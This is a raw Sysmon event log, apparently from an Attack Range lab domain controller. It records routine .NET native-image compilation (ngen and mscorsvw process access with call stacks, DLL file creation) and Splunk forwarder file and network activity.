21:04:25.462{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.415{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.384{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.384{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:25.353{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8c4-0\Microsoft.Storage.Vds.dll2021-06-23 21:04:25.353 354300x800000000000000020771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.267{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61425-false10.0.1.12-8000- 10341000x800000000000000020770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.025{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.009{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.009{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.806{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.806{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.760{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0880C0B0C9D61552DC80E6C86C9CC724,SHA256=76C277288F29695DB42563AB4616A26FDB2FEE99AA11DEB7B2A6879BC370036B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:26.728{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a70-0\Microsoft.Transactions.Bridge.Dtc.dll2021-06-23 21:04:26.728 10341000x800000000000000020795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.571{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.556{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.447{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.431{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.415{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-C803-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:26.321{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15e0-0\Microsoft.Transactions.Bridge.dll2021-06-23 21:04:26.321 23542300x800000000000000020788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.134{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=46FA1A6785772762AF52E677174E176C,SHA256=1542F9D33514F41CB767B78CB407C16D62F93AE97BF8D1F05DDB2C73974027F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCDA3670D8B112863E996B3E772B3FF,SHA256=0E1128FB84D58C9EB8324796ED487F45A77D7243E460FF4825A4883FF9FE16F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.915{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.899{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.899{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CE03-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:27.821{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1990-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-06-23 21:04:27.821 23542300x800000000000000020812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.806{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8811025D191182E95626003990DAD6,SHA256=897CF2DF1171C0BF8EAB6DD65D57D54501A5A1E74B617FD39BD707F78DE9757B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 